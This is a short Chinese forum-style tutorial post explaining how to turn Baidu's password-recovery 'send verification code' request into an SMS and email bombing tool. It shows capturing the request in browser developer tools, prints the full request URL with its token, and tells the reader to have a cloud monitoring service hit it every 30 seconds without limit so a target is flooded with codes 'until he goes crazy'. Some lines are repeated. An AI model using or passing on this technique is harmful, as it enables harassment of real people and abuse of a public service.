【BUG】◇15-05-30◆〖教程帖〗找回密码的端口短信轰炸的教程
首先,进入到找回密码网站:https://passport.baidu.com/?getpassindex&tpl=tb&u=http%3A%2F%2Ftieba.baidu.com%2F(屁话)
点发送验证码,再看审核元素的网络控制台,刚刚抓到的包就是发送验证码的端口单击包名称,request url里的链接https://passport.baidu.com/v2/sapi/authwidgetverify?authtoken=68f3Hwar%2BwqUR3qL5v3J9arfudG96ZSh2RXDo7b8LBAcseXzk6WoDIgtLTfWTN9JrMORvGb0jfEr3qoKFN2OYhvrhDjRCjEMKZWKG6lxzbl3zWW9m9lRgFsvVwPIUfxw21ewuNRkv0Y%2FPo9eBu3JBhVHPBPDTD1RR%2BT7xyGt5WPAhrD5Xyz5UTMcH%2FA75bo8bBpF56qJXoWz3Hw4a%2F7H3ZakUiFXOImyevovMhgMVNdtnZ3Zsy5CMeeS9c1PYBkJ6gbKJhFbLV3lo67KrT4BSVi7M5ESnCLFnBYuBEsO9%2F2K%2BJLC7fviWFuvxWJteouMJItYhc0adA%2BruN4t7Zypzc9Nqa08QxjdLuPWAvwywwzPvc2j&jsonp=1&type=email&apiver=v3&verifychannel=&action=send&vcode=&needsid=&rsakey=&callback=bd__cbs__5hcxf9
就是端口(地址)
就是端口(地址)
然后,你就可以在各大云监控上设置监控,推荐设置30秒一次,没有时间限制(你没听错),这样,每访问一次这个地址,就会向用户的手机或邮箱发送一次验证码,直到他疯为止
本教程示范用的是邮箱,手机同理,就是改一下验证方式,抓包方法一样
本教程示范用的是邮箱,手机同理,就是改一下验证方式,抓包方法一样